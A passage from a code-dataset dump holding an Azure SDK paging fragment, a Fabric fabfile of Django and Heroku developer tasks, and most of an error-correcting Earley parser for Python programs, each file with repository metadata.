request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(get_next, extract_data)
list_metric_definitions.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/databases/{databaseRid}/collections/{collectionRid}/metricDefinitions"} # type: ignore
| [
"[email protected]"
] | |
751cf05a4a081982c332d1d32c6bfbd742ac75f9 | 40ca01569e9c8ed6d2312447fac604229bdeace3 | /fabfile.py | bb0342de308a2dc2d08064b855fa24d83163edb7 | [
"MIT"
] | permissive | deniskrumko/izyan-poker | c393c9c4cb401d3180a97075fde59ff2e371a77d | ce70c9c8f761409adad289809e5220237b312407 | refs/heads/master | 2021-06-14T08:59:03.364660 | 2020-02-11T06:48:00 | 2020-02-11T06:48:00 | 200,377,031 | 7 | 2 | MIT | 2021-06-10T18:43:43 | 2019-08-03T13:11:06 | Python | UTF-8 | Python | true | false | 3,424 | py | from fabric.api import task, local
def print_msg(msg, error=False):
"""Print message in console."""
def green_msg(msg):
"""Make message green color in console."""
return '\033[92m{0}\033[00m'.format(msg)
def red_msg(msg):
"""Make message red color in console."""
return '\033[91m{0}\033[00m'.format(msg)
print_function = red_msg if error else green_msg
print(print_function('\n{}\n'.format(msg)))
# MAIN COMMANDS
# ============================================================================
@task
def manage(command):
"""Run ``python3 manage.py`` command."""
return local('python3 manage.py {}'.format(command))
@task
def run():
"""Run server."""
return manage('runserver')
@task
def shell():
"""Run server."""
return manage('shell_plus')
# GIT
# ============================================================================
@task
def push(force=False):
"""Push changes to all servers."""
force = ' --force' if force else ''
print_msg('1. Pushing to origin')
local(f'git push origin master --tags{force}')
print_msg('2. Pushing to Heroku')
local(f'git push heroku master{force}')
# LOCALES
# ============================================================================
@task
def makemessages():
"""Make messages."""
return manage('makemessages -l ru --no-location')
@task
def compilemessages():
"""Compile messages."""
return manage('compilemessages')
# MIGRATIONS AND DATABASE
# ============================================================================
@task
def makemigrations():
"""Make migrations for database."""
manage('makemigrations')
@task
def migrate():
"""Apply migrations to database."""
print_msg('Applying migrations')
manage('migrate')
@task
def createsuperuser(email='[email protected]'):
"""Create superuser with default credentials."""
print_msg('Creating superuser')
return manage('createsuperuser --username root --email {}'.format(email))
@task
def resetdb():
"""Reset database to initial state."""
print_msg('Remove "scr/media" folder')
local('rm -rf media/')
print_msg('Reset database')
manage('reset_db -c --noinput')
migrate()
createsuperuser()
# STATIC CHECKS: ISORT AND PEP8
# ============================================================================
@task
def isort():
"""Fix imports formatting."""
print_msg('Running imports fix')
local('isort apps config -y -rc')
@task
def pep8(path='apps core'):
"""Check PEP8 errors."""
print_msg('Checking PEP8 errors')
return local('flake8 --config=.flake8 {}'.format(path))
# PIPENV
# ============================================================================
@task
def lock():
"""Lock requirements."""
print_msg('Locking requirements')
local('pipenv lock')
@task
def install():
"""Install requirements."""
print_msg('Installing DEV requirements')
local('pipenv install --dev')
# HEROKU
# ============================================================================
@task
def logs():
local('heroku logs --source app --tail')
@task
def scale(value=1):
local(f'heroku ps:scale web={value}')
@task
def ps():
local(f'heroku ps')
@task
def runweb():
local(f'heroku local web -f Procfile.local')
@task
def python(command):
local(f'heroku run python {command}')
| [
"[email protected]"
] | |
576b6d9babf5c6a9873f3626e654acd855eb9a57 | e547f7a92e7a1c1d79f8631f9e8ee8a93879a4eb | /src/ecpp_individual_grammar_all_states.py | b9efc69d0dd8291e782f6fe9c3c66b6e7bc673e7 | [] | no_license | gsakkas/seq2parse | 3c33ec7bc6cc6e4abd9e4981e53efdc173b7a7b9 | 7ae0681f1139cb873868727f035c1b7a369c3eb9 | refs/heads/main | 2023-04-09T12:29:37.902066 | 2023-01-18T21:32:12 | 2023-01-18T21:32:12 | 417,597,310 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 58,203 | py | """
Error Correcting Python Earley Parser.
@author: Georgios Sakkas, Earley Parser based on Hardik's implementation
"""
import argparse
import re
# from ast import parse
from pathlib import Path
from collections import defaultdict, deque
from itertools import product
from nltk.tree import Tree
from functools import partial
import pygments
from pygments.lexers import get_lexer_by_name
from pygments.token import Text, Name, Number, String, Punctuation, Operator, Keyword
class Rule():
"""
Represents a CFG rule.
"""
def __init__(self, lhs, rhs):
# Represents the rule 'lhs -> rhs', where lhs is a non-terminal and
# rhs is a list of non-terminals and terminals.
self.lhs, self.rhs = lhs, rhs
def __contains__(self, sym):
return sym in self.rhs
def __eq__(self, other):
if isinstance(other, (Rule, ErrorRule)):
return self.lhs == other.lhs and self.rhs == other.rhs
return False
def __hash__(self):
return hash((" ".join(self.lhs), " ".join(self.rhs)))
def __getitem__(self, i):
return self.rhs[i]
def __len__(self):
return len(self.rhs)
def __repr__(self):
return self.__str__()
def __str__(self):
return self.lhs + ' -> ' + ' '.join(self.rhs)
def error_score(self):
return 0
class ErrorRule(Rule):
def error_score(self):
if self.lhs in ['Err_Dedent', 'Err_Indent', 'Err_Close_Paren', 'Err_Open_Paren']:
return 0.5
return 1
class Grammar():
"""
Represents a CFG.
"""
def __init__(self):
# The rules are represented as a dictionary from L.H.S to R.H.S.
self.rules = defaultdict(list)
def add(self, rule):
"""
Adds the given rule to the grammar.
"""
if rule not in self.rules[rule.lhs]:
self.rules[rule.lhs].append(rule)
def get_alphabet(self):
symbols = set([])
alphabet = set([])
for key in self.rules:
for rule in self.rules[key]:
for sym in rule.rhs:
symbols.add(sym)
for sym in symbols:
if self.is_terminal(sym):
if sym not in alphabet:
alphabet.add(sym)
return alphabet
def get_tags(self):
symbols = set([])
tags = set([])
for key in self.rules:
for rule in self.rules[key]:
for sym in rule.rhs:
symbols.add(sym)
for sym in symbols:
if self.is_tag(sym):
if sym not in tags:
tags.add(sym)
return tags
@staticmethod
def load_grammar(fpath):
"""
Loads the grammar from file (from the )
"""
grammar = Grammar()
with open(fpath) as f:
for line in f:
line = line.strip()
if len(line) == 0:
continue
entries = line.split('->')
lhs = entries[0].strip()
for rhs in entries[1].split('<|>'):
grammar.add(Rule(lhs, rhs.strip().split()))
return grammar
def __repr__(self):
return self.__str__()
def __str__(self):
s = [str(r) for r in self.rules['S']]
for nt, rule_list in self.rules.items():
if nt == 'S':
continue
s += [str(r) for r in rule_list]
return '\n'.join(s)
# Returns the rules for a given Non-terminal.
def __getitem__(self, nt):
return self.rules[nt]
def is_terminal(self, sym):
"""
Checks is the given symbol is terminal.
"""
return len(self.rules[sym]) == 0
def is_tag(self, sym):
"""
Checks whether the given symbol is a tag, i.e. a non-terminal with rules
to solely terminals.
"""
if not self.is_terminal(sym):
return all(self.is_terminal(s) for r in self.rules[sym] for s in
r.rhs)
return False
def is_nullable(self, sym):
"""
Checks whether the given symbol is nullable, i.e. a non-terminal with rules
to null.
"""
if not self.is_terminal(sym):
return any(r.rhs==[] for r in self.rules[sym])
class ErrorGrammar(Grammar):
@staticmethod
def load_grammar(fpath):
"""
Loads the grammar from file (from the )
"""
grammar = ErrorGrammar()
with open(fpath) as f:
for line in f:
line = line.strip()
if len(line) == 0:
continue
entries = line.split('->')
lhs = entries[0].strip()
for rhs in entries[1].split('<|>'):
rhssymbols = rhs.strip().split()
grammar.add(Rule(lhs, rhssymbols))
return grammar
def update_error_grammar(self, changes):
# print(len(str(self).split('\n')))
alphabet = self.get_alphabet()
tags = self.get_tags()
alphabet.remove('_ENDMARKER_')
#second step
all_important_tags = []
for ch in changes:
important_terminals = ch[1].split() if ch[1] is not None else []
# important_terminals += ch[2].split() if ch[2] is not None else []
important_tags = []
for tag in tags:
if ch[2] is not None:
for tok in ch[2].split():
if any([(tok in rule) for rule in self.rules[tag]]):
important_tags.append(tag)
important_tags = list(set(important_tags))
if ch[0] == 'deleted':
for sym in important_tags:
# self.add(ErrorRule("Err_" + sym, [sym]))
self.add(Rule("Err_" + sym, ["H", sym]))
# self.add(ErrorRule("Err_" + sym, ["InsertErr", sym]))
all_important_tags.append(sym)
for sym in important_terminals:
self.add(ErrorRule("InsertErr", [sym]))
elif ch[0] == 'added':
for sym in important_tags:
# self.add(ErrorRule("Err_" + sym, [sym]))
self.add(ErrorRule("Err_" + sym, ["Err_Tag"]))
all_important_tags.append(sym)
self.add(ErrorRule("Err_" + sym, []))
else:
for sym in important_tags:
# self.add(ErrorRule("Err_" + sym, [sym]))
self.add(ErrorRule("Err_" + sym, ["Err_Tag"]))
self.add(Rule("Err_" + sym, ["H", sym]))
all_important_tags.append(sym)
self.add(ErrorRule("Err_" + sym, []))
for sym in important_terminals:
self.add(ErrorRule("Err_Tag", [sym]))
self.add(ErrorRule("InsertErr", [sym]))
all_important_tags = list(set(all_important_tags))
#first step in Algorithm 1 in AHO's paper
added_rules_1 = []
for key in self.rules:
if not key.startswith('Err_') and not key.startswith('InsertErr'):
for rule in self.rules[key]:
if rule.error_score() < 1:
new_rules_1 = ErrorGrammar.error_rule_1(self, rule, all_important_tags)
if new_rules_1:
added_rules_1.extend(new_rules_1)
for rule in added_rules_1:
self.add(rule)
# print('++++++++++++++++++++++++++')
# for key in self.rules:
# for rule in self.rules[key]:
# if rule.error_score() > 0:
# print(rule)
# print('++++++++++++++++++++++++++')
#third step
self.add(Rule("S'", ["S"]))
self.add(Rule("S'", ["S", "InsertErr"]))
self.add(Rule("H", ["H", "InsertErr"]))
self.add(Rule("H", ["InsertErr"]))
# print(self)
# print(len(str(self).split('\n')))
error_rules = [r for k in self.rules for r in self.rules[k]]
error_rules = list(filter(lambda er: er.lhs.startswith('Err_') or er.lhs == 'InsertErr', error_rules))
return error_rules
@staticmethod
def error_rule_1(grammar, rule, itags):
if grammar.is_tag(rule.lhs):
return []
new_rules_rhs = []
flag = False
for sym in rule.rhs:
if not grammar.is_tag(sym):
# if not grammar.is_tag(sym) or sym in ['Endmarker']:
new_rules_rhs.append([sym])
elif sym in itags:
new_rules_rhs.append(["Err_" + sym, sym])
flag = True
else:
new_rules_rhs.append([sym])
new_rules = []
for rule_rhs in product(*new_rules_rhs):
if list(rule_rhs) != rule.rhs:
new_rules.append(Rule(rule.lhs, list(rule_rhs)))
return new_rules
@staticmethod
def error_rule_0(grammar, rule, itags):
if rule.lhs in ['Annotated_Assign']:
return []
if grammar.is_tag(rule.lhs):
return []
new_rules_rhs = []
flag = False
for sym in rule.rhs:
if not grammar.is_tag(sym):
# if not grammar.is_tag(sym) or sym in ['Endmarker']:
new_rules_rhs.append([sym])
elif sym in itags:
new_rules_rhs.append(["Err_" + sym, sym])
flag = True
else:
new_rules_rhs.append([sym])
new_rules = []
for rule_rhs in product(*new_rules_rhs):
if list(rule_rhs) != rule.rhs:
new_rules.append(Rule(rule.lhs, list(rule_rhs)))
return new_rules
def update_error_grammar_with_erules(self, erules):
# print(len(str(self).split('\n')))
alphabet = self.get_alphabet()
tags = self.get_tags()
alphabet.remove('_ENDMARKER_')
# Maybe remove "Tfpdef -> Vfpdef Err_Colon Test" typed definitions in the future
#second step
all_important_tags = []
for erl in erules:
entries = erl.split('->')
lhs = entries[0].strip()
if 'H ' in entries[1]:
self.add(Rule(lhs, entries[1].strip().split()))
else:
self.add(ErrorRule(lhs, entries[1].strip().split()))
if lhs.startswith('Err_'):
sym = lhs.replace('Err_', '')
all_important_tags.append(sym)
all_important_tags = list(set(all_important_tags))
#first step in Algorithm 1 in AHO's paper
added_rules_1 = []
for key in self.rules:
if not key.startswith('Err_') and not key.startswith('InsertErr'):
for rule in self.rules[key]:
if rule.error_score() < 1:
new_rules_0 = ErrorGrammar.error_rule_0(self, rule, all_important_tags)
if new_rules_0:
added_rules_1.extend(new_rules_0)
for rule in added_rules_1:
self.add(rule)
# print('++++++++++++++++++++++++++')
# num_of_erules = 0
# for key in self.rules:
# for rule in self.rules[key]:
# if rule.error_score() > 0:
# print(rule)
# num_of_erules += 1
# print(num_of_erules)
# print('++++++++++++++++++++++++++')
#third step
self.add(Rule("S'", ["S"]))
self.add(Rule("S'", ["S", "InsertErr"]))
self.add(Rule("H", ["H", "InsertErr"]))
self.add(Rule("H", ["InsertErr"]))
# print(self)
# print(len(str(self).split('\n')))
class State():
"""
Represents a state in the error-correcting Earley algorithm.
"""
GAM = '<GAM>'
def __init__(self, rule, dot=0, sent_pos=0, chart_pos=0, error_count=0, back_pointers=[]):
# CFG Rule.
self.rule = rule
# Dot position in the rule.
self.dot = dot
# Sentence position.
self.sent_pos = sent_pos
# Chart index.
self.chart_pos = chart_pos
# Error counter
self.error_count = error_count
# Pointers to child states (if the given state was generated using
# Completer).
self.back_pointers = back_pointers
# Hash for the back_pointers for efficient usage
self.own_hash = hash((self.rule, self.dot, self.sent_pos, self.error_count)) + \
hash(", ".join(str(hash(s)) for s in back_pointers) if back_pointers else hash("empty"))
def __eq__(self, other):
if isinstance(other, State):
return self.rule == other.rule and self.dot == other.dot and \
self.sent_pos == other.sent_pos and self.error_count == other.error_count and \
self.own_hash == other.own_hash
return False
def __hash__(self):
return self.own_hash
def __len__(self):
return len(self.rule)
def __repr__(self):
return self.__str__()
def __str__(self):
def str_helper(state):
return ('(' + state.rule.lhs + ' -> ' +
' '.join(state.rule.rhs[:state.dot] + ['*'] +
state.rule.rhs[state.dot:]) +
(', [%d, %d], %d)' % (state.sent_pos, state.chart_pos, state.error_count)))
return (str_helper(self) +
' (' + ', '.join(str_helper(s) for s in self.back_pointers) + ')')
def next(self):
"""
Return next symbol to parse, i.e. the one after the dot
"""
if self.dot < len(self):
return self.rule[self.dot]
def is_complete(self):
"""
Checks whether the given state is complete.
"""
return len(self) == self.dot
@staticmethod
def init():
"""
Returns the state used to initialize the chart in the Earley algorithm.
"""
return State(Rule(State.GAM, ["S'"]))
class ChartEntry():
"""
Represents an entry in the chart used by the Earley algorithm.
"""
def __init__(self, states):
# List of Earley states.
self.states = deque(states)
self.seen = dict([])
def __iter__(self):
return iter(list(self.states) + list(self.seen.keys()))
def __len__(self):
return len(self.states) + len(self.seen.keys())
def __repr__(self):
return self.__str__()
def __str__(self):
return '\n'.join(str(s) for s in list(self.states) + list(self.seen.keys()))
def pop_state(self, cost):
"""
Return the next unseen state
"""
while len(self.states) > 0:
state = self.states.popleft()
if state.error_count <= cost:
if state not in self.seen:
self.seen[state] = state.error_count
return state
return None
def add(self, grammar, state):
"""
Add the given state (if it hasn't already been added).
"""
if state not in self.states and state not in self.seen:
if state.is_complete() and grammar.is_nullable(state.rule.lhs):
self.states.append(state)
else:
self.states.appendleft(state)
class Chart():
"""
Represents the chart used in the Earley algorithm.
"""
def __init__(self, entries):
# List of chart entries.
self.entries = entries
def __getitem__(self, i):
return self.entries[i]
def __len__(self):
return len(self.entries)
def __repr__(self):
return self.__str__()
def __str__(self):
return '\n\n'.join([("Chart[%d]:\n" % i) + str(entry) for i, entry in
enumerate(self.entries)])
@staticmethod
def init(l):
"""
Initializes a chart with l entries (Including the dummy start state).
"""
return Chart([(ChartEntry([]) if i > 0 else
ChartEntry([State.init()])) for i in range(l)])
class ErrorEarleyParse():
"""
Represents the Error-correcting Earley-generated parse for a given sentence according to a
given grammar.
"""
def __init__(self, sentence, grammar, max_cost=3):
self.words = sentence.split()
self.grammar = grammar
self.chart = Chart.init(len(self.words) + 1)
# Maximum number of error correcting rules to use
self.max_cost = max_cost
def predictor(self, state, pos):
"""
Error-correcting Earley Predictor.
"""
# runs = 0
for rule in self.grammar[state.next()]:
# This is my optimization to avoid using that many ErrorRules
self.chart[pos].add(self.grammar, State(rule, dot=0,
sent_pos=state.chart_pos, chart_pos=state.chart_pos))
# runs += 1
# print("===================")
# print("<<Predictor>>")
# print("Chart[" + str(pos) + "]")
# print(self.chart[pos])
# print(">>>", state)
# print("===================")
# return runs
def scanner(self, state, pos):
"""
Error-correcting Earley Scanner.
"""
# runs = 1
if state.chart_pos < len(self.words):
word = self.words[state.chart_pos]
# runs = ([(word in r) for r in self.grammar[state.next()]] + [True]).index(True)
if any((word in r) for r in self.grammar[state.next()]):
new_cost = 1 if state.next().startswith('Err_') or state.next() == 'InsertErr' else 0
if new_cost <= self.max_cost:
self.chart[pos + 1].add(self.grammar, State(Rule(state.next(), [word]),
dot=1, sent_pos=state.chart_pos,
chart_pos=(state.chart_pos + 1),
error_count=new_cost))
# print("===================")
# print("<<Scanner>>")
# print("Chart[" + str(pos+1) + "]")
# print(self.chart[pos+1])
# print(">>>", state)
# print("===================")
# return runs
def completer(self, state, pos):
"""
Error-correcting Earley Completer.
"""
# runs = 0
# print("===================")
# print("<<Completer>>")
# print(">>>", state)
for prev_state in self.chart[state.sent_pos]:
if prev_state.next() == state.rule.lhs:
new_cost = prev_state.error_count + state.error_count + state.rule.error_score()
if state.rule.lhs == 'Err_Tag':
if state.rule.rhs == []:
new_cost = 1
elif any((state.rule.rhs[0] in r) for r in self.grammar[prev_state.rule.lhs.replace('Err_', '')]):
new_cost = prev_state.error_count
if new_cost <= self.max_cost:
self.chart[pos].add(self.grammar, State(prev_state.rule,
dot=(prev_state.dot + 1), sent_pos=prev_state.sent_pos,
chart_pos=pos,
back_pointers=(prev_state.back_pointers + [state]),
error_count=new_cost))
# runs += 1
# print("Chart[" + str(pos) + "]")
# print(self.chart[pos])
# print("===================")
# return runs
def parse(self):
"""
Parses the sentence by running the Earley algorithm and filling out the
chart.
"""
# Checks whether the next symbol for the given state is a tag.
def is_tag(state):
return self.grammar.is_tag(state.next())
for i in range(len(self.chart)):
# print("Chart[" + str(i) + "]")
# print(len(self.chart[i]))
# jj = 0
# print("===================")
state = self.chart[i].pop_state(self.max_cost)
while state is not None:
# print(">>>", state)
# print("===================")
# jj += 1
if not state.is_complete():
if is_tag(state) and not self.grammar.is_nullable(state.next()):
self.scanner(state, i)
else:
self.predictor(state, i)
# if state.next().startswith('Err_'):
# print(state)
# if self.grammar.is_nullable(state.next()):
# print("FUCCKYEAH", state)
# self.completer(state, i)
# self.chart[i].add_other_states(state)
else:
self.completer(state, i)
state = self.chart[i].pop_state(self.max_cost)
# print("YOOO!", state, state == None)
# print(jj)
# print(self.chart[i])
# print(len(self.chart[i]))
# break
# if self.get_parses() > 1:
# print("Cost =", cost)
# break
# for i in range(len(self.chart)):
# print("Chart[" + str(i) + "]")
# # print("===================")
# print(len(self.chart[i]))
# print(self.chart[i])
# # print("Cost =", cost)
# print(self.chart)
def has_parse(self):
"""
Checks whether the sentence has a parse.
"""
for state in self.chart[-1]:
if state.is_complete() and state.rule.lhs == "S'" and \
state.sent_pos == 0 and state.chart_pos == len(self.words):
return True
return False
def get_parses(self):
"""
Checks whether the sentence has a parse.
"""
num_of_parses = 0
for state in self.chart[-1]:
if state.is_complete() and state.rule.lhs == "S'" and \
state.sent_pos == 0 and state.chart_pos == len(self.words):
num_of_parses += 1
return num_of_parses
def get(self):
"""
Returns the minimum error parse if it exists, otherwise returns None.
"""
def get_helper(state):
# print(state)
if self.grammar.is_tag(state.rule.lhs):
if state.rule.rhs != []:
return Tree(state.rule.lhs, [state.rule.rhs[0]])
return Tree(state.rule.lhs, [state.rule.lhs.replace('Err_', '')])
return Tree(state.rule.lhs,
[get_helper(s) for s in state.back_pointers])
found_state = None
errors = float("inf")
for state in self.chart[-1]:
if state.is_complete() and state.rule.lhs == "S'" and \
state.sent_pos == 0 and state.chart_pos == len(self.words):
if state.error_count < errors:
# get_helper(state).pretty_print()
# print(state.error_count)
found_state = state
errors = state.error_count
if found_state is not None:
return get_helper(found_state)
return None
def get_rules(self):
"""
Returns the minimum error parse if it exists, otherwise returns None.
"""
def get_helper(state):
# print(state)
if self.grammar.is_tag(state.rule.lhs):
return [state.rule]
result = [state.rule]
for s in state.back_pointers:
result.extend(get_helper(s))
return result
found_state = None
errors = float("inf")
for state in self.chart[-1]:
if state.is_complete() and state.rule.lhs == "S'" and \
state.sent_pos == 0 and state.chart_pos == len(self.words):
if state.error_count < errors:
found_state = state
errors = state.error_count
if found_state is not None:
return get_helper(found_state)
return None
def get_fixed_seq(self):
"""
Returns the minimum error parse if it exists, otherwise returns None.
"""
def get_helperrr(state):
# print(state)
if self.grammar.is_tag(state.rule.lhs) or \
(self.grammar.is_tag(state.rule.lhs.replace('Err_', '')) and \
(state.rule.rhs == [] or state.rule.rhs[0] != 'H')):
if state.rule.rhs != []:
return Tree(state.rule.lhs, [state.rule.rhs[0]])
return Tree(state.rule.lhs, [state.rule.lhs.replace('Err_', '')])
return Tree(state.rule.lhs,
[get_helperrr(s) for s in state.back_pointers])
def get_helper(state):
if self.grammar.is_tag(state.rule.lhs) or \
(self.grammar.is_tag(state.rule.lhs.replace('Err_', '')) and \
(state.rule.rhs == [] or state.rule.rhs[0] != 'H')):
return [state]
if state.rule.rhs:
if state.rule.rhs[0] == 'Err_Tag':
return [state]
result = []
for s in state.back_pointers:
result.extend(get_helper(s))
return result
def get_erules(state):
if self.grammar.is_tag(state.rule.lhs):
return [state.rule]
result = [state.rule]
for s in state.back_pointers:
result.extend(get_erules(s))
return result
found_states = []
for state in self.chart[-1]:
if state.is_complete() and state.rule.lhs == "S'" and \
state.sent_pos == 0 and state.chart_pos == len(self.words):
# print(get_helper(state))
candidate = get_helper(state)
used_erules = get_erules(state)
# if any(map(lambda st: "Err" in st.rule.lhs, candidate)):
found_states.append((candidate, used_erules, state.error_count))
# get_helperrr(state).draw()
if found_states:
found_states = sorted(found_states, key=lambda st: st[2])
# cand_parses, used_erls, costs = zip(*found_states)
# print(costs)
# for jst in just_states:
# print(jst)
# for st in elsse:
# get_helperrr(st).draw()
# Return Top N = 10 repairs with lowest cost
return found_states
return None
class Lexer():
"""
Simple lexer for Python programs
"""
def __init__(self, terminals):
self.lexer = get_lexer_by_name("python")
self.terminals = terminals
def lex(self, input_program):
program = input_program
if len(input_program) > 1:
if input_program[-1] != '\n':
program = input_program + '\n'
program = self.remove_comments_and_strings(program)
# Some hacks for random errors
if "’" in program:
program = program.replace("’", "'")
program = self.remove_comments_and_strings(program)
# Clean tabs
all_lines = []
for line in program.split('\n'):
spaces_so_far = 0
if len(line) > 0:
if line[0] in [' ', '\t']:
for char in line:
if char == ' ':
spaces_so_far += 1
elif char == '\t':
spaces_so_far = (spaces_so_far // 4 + 1) * 4
else:
break
all_lines.append(' ' * spaces_so_far + line.lstrip().replace('\t', ' '))
all_lines = list(map(lambda line: list(pygments.lex(line.rstrip(), self.lexer)), all_lines))
all_lines = self.update_indents_stack(all_lines)
all_lines = self.update_spaces_and_nls(all_lines)
all_lines = self.update_tokens(all_lines)
tokens = [tok for line in all_lines for tok in line]
tokens = self.final_cleaning(tokens, False)
return tokens
def clean_with_lex(self, input_program):
program = input_program
# print(program)
if len(input_program) > 1:
if input_program[-1] != '\n':
program = input_program + '\n'
program = self.remove_comments_and_strings(program)
# Some hacks for random errors
if "’" in program:
program = program.replace("’", "'")
program = self.remove_comments_and_strings(program)
# Store strings for later use
all_strings, all_string_types = self.get_comments_and_strings(input_program, program)
# print(all_strings, all_string_types)
# Clean tabs
all_lines = []
for line in program.split('\n'):
spaces_so_far = 0
if len(line) > 0:
if line[0] in [' ', '\t']:
for char in line:
if char == ' ':
spaces_so_far += 1
elif char == '\t':
spaces_so_far = (spaces_so_far // 4 + 1) * 4
else:
break
all_lines.append(' ' * spaces_so_far + line.lstrip().replace('\t', ' '))
all_lines = list(map(lambda line: list(pygments.lex(line.rstrip(), self.lexer)), all_lines))
all_lines = self.update_indents_stack(all_lines)
all_lines = self.update_spaces_and_nls(all_lines)
all_lines = self.update_tokens_with_actual(all_lines)
tokens = [tok for line in all_lines for tok in line]
tokens = self.final_cleaning(tokens, True)
# Put strings back
# print('-' * 42 + '\n' + input_program + '\n' + '=' * 42 + '\n' + tokens.replace('_NEWLINE_ ', '\n') + '\n' + '*' * 42 + '\n')
if tokens.count("_STRING_") == len(all_strings):
# prev_len = len(tokens.split())
# new_tokens = tokens
for string, stype in zip(all_strings, all_string_types):
if ' ' in string:
string = string.replace(' ', "_white_space_")
tokens = tokens.replace('_STRING_', stype + string + stype, 1)
# print(len(new_tokens.split()), prev_len)
# print(new_tokens.split())
# print(tokens.split())
# if len(new_tokens.split()) == len(tokens.split()):
# tokens = new_tokens
# else:
# tokens = tokens.replace('_STRING_', "\"_some_string_\"")
else:
tokens = tokens.replace('_STRING_', "\"_some_string_\"")
# print('-' * 42 + '\n' + '=' * 42 + '\n' + tokens.replace('_NEWLINE_ ', '\n') + '\n' + '*' * 42 + '\n')
return tokens
def remove_comments_and_strings(self, input_prog):
prog = input_prog.replace("\r\n", "\n")
prog = re.sub(re.compile(r"\\\s*?\n") , "" , prog)
# Temporary replacements
prog = prog.replace("\\\\", "__temporary__")
prog = prog.replace("\\\"", "__double_quote__")
prog = prog.replace("\\\'", "__single_quote__")
prog = prog.replace("__temporary__", "\\\\")
# String and comment replacements
prog = re.sub(re.compile(r"\n\s*#.*?\n") , "\n" , prog)
prog = re.sub(re.compile(r"\"\"\".*?\"\"\"", flags=re.DOTALL) , "__triple_dstring__" , prog)
prog = re.sub(re.compile(r"\'\'\'.*?\'\'\'", flags=re.DOTALL) , "__triple_sstring__" , prog)
in_double_quote = False
in_single_quote = False
in_comment = False
new_prog = ""
for char in prog:
if not in_comment:
if not in_double_quote and not in_single_quote and char == "#":
in_comment = True
new_prog += char
elif not in_double_quote and not in_single_quote and char == "\"":
in_double_quote = True
new_prog += char
elif not in_double_quote and not in_single_quote and char == "\'":
in_single_quote = True
new_prog += char
elif in_double_quote and not in_single_quote and char == "\"":
in_double_quote = False
new_prog += char
elif in_double_quote and not in_single_quote and char == "\'":
new_prog += "__single_quote__"
elif not in_double_quote and in_single_quote and char == "\'":
in_single_quote = False
new_prog += char
elif not in_double_quote and in_single_quote and char == "\"":
new_prog += "__double_quote__"
else:
new_prog += char
else:
if char == "\n":
in_comment = False
new_prog += char
elif char == "\'":
new_prog += "__single_quote__"
elif char == "\"":
new_prog += "__double_quote__"
else:
new_prog += char
prog = new_prog
prog = re.sub(re.compile(r"\"([^(\"|\'|\n)]|\(|\)|\|)*?\"") , "\"__string__\"" , prog)
prog = re.sub(re.compile(r"\'([^(\"|\'|\n)]|\(|\)|\|)*?\'") , "\'__string__\'" , prog)
prog = prog.replace("__triple_dstring__", "\"__string__\"")
prog = prog.replace("__triple_sstring__", "\'__string__\'")
prog = re.sub(re.compile(r"#.*?\n" ) , "\n" , prog)
prog = re.sub(re.compile(r"\n\s+\n" ) , "\n" , prog)
while prog.find('\n\n') >= 0:
prog = prog.replace('\n\n', '\n')
return prog
def get_comments_and_strings(self, input_prog, prog):
strings = []
string_types = []
clean_input_prog = input_prog.replace("\r\n", "\n")
clean_input_prog = clean_input_prog.replace("’", "'")
if len(clean_input_prog) > 1:
if clean_input_prog[-1] != '\n':
clean_input_prog = clean_input_prog + '\n'
clean_input_prog = re.sub(re.compile(r"\\\s*?\n") , "" , clean_input_prog)
clean_input_prog = re.sub(re.compile(r"\n\s*#.*?\n") , "\n" , clean_input_prog)
clean_input_prog = re.sub(re.compile(r"#[^\'\"]*?\n" ) , "\n" , clean_input_prog)
clean_input_prog = re.sub(re.compile(r"\n\s+\n" ) , "\n" , clean_input_prog)
while clean_input_prog.find('\n\n') >= 0:
clean_input_prog = clean_input_prog.replace('\n\n', '\n')
# print("=*" * 42 + "=")
# print(clean_input_prog)
parts = prog.split("__string__")
# print(parts)
while parts:
part = parts.pop(0)
clean_input_prog = clean_input_prog.replace(part, '', 1)
if parts == [] or clean_input_prog == "" or clean_input_prog.split(parts[0]) == []:
break
split_prog = clean_input_prog.split(parts[0])
strings.append(split_prog[0].replace('\n', '_NEWLINE_'))
clean_input_prog = clean_input_prog.replace(strings[-1], '', 1)
if len(clean_input_prog) > 2 and clean_input_prog[:3] == "\"\"\"":
string_types.append("\"\"\"")
elif len(clean_input_prog) > 2 and clean_input_prog[:3] == "\'\'\'":
string_types.append("\'\'\'")
elif len(clean_input_prog) > 0 and clean_input_prog[0] == "\"":
string_types.append("\"")
elif len(clean_input_prog) > 0 and clean_input_prog[0] == "\'":
string_types.append("\'")
else:
string_types.append("\"")
return strings, string_types
def update_indents_stack(self, all_lines):
all_line_tokens = []
lst_token_prev_line = False
fst_token_this_line = False
indents = []
paren_so_far = 0
curly_so_far = 0
square_so_far = 0
for token_list in all_lines:
fst_token = token_list[0]
tok_idx = 0
fst_real_token = token_list[tok_idx]
while fst_real_token[0] in Text and fst_real_token[1].replace(' ', '') == '':
tok_idx += 1
if tok_idx < len(token_list):
fst_real_token = token_list[tok_idx]
else:
break
fst_token_this_line = fst_real_token[0] in Operator and fst_real_token[1] in ['+', '-', '*', '/', '//', '%', '==', '!=', 'in', 'or', 'and'] and (paren_so_far > 0 or curly_so_far > 0 or square_so_far > 0)
fst_token_this_line |= fst_real_token[0] in Punctuation and fst_real_token[1] in [',', '}', ')', ']'] and (paren_so_far > 0 or curly_so_far > 0 or square_so_far > 0)
fst_token_this_line |= fst_real_token[0] in Punctuation and fst_real_token[1] in ['(', '['] and (paren_so_far > 0 or curly_so_far > 0 or square_so_far > 0)
fst_token_this_line |= fst_real_token[0] in Keyword and fst_real_token[1] == 'for' and (paren_so_far > 0 or curly_so_far > 0 or square_so_far > 0)
fst_token_this_line |= fst_real_token[0] in String and lst_token_prev_line and (paren_so_far > 0 or curly_so_far > 0 or square_so_far > 0)
if lst_token_prev_line:
# Checks if previous line ends with an operator, paren etc. and we are within a parenthesis, thus we must not indent
last_line_tokens = all_line_tokens.pop()
if len(last_line_tokens) > 1:
all_line_tokens.append(last_line_tokens[:-1])
all_line_tokens.append(token_list)
elif fst_token_this_line:
# Checks if line starts with an operator and we are within a parenthesis, thus we must not indent
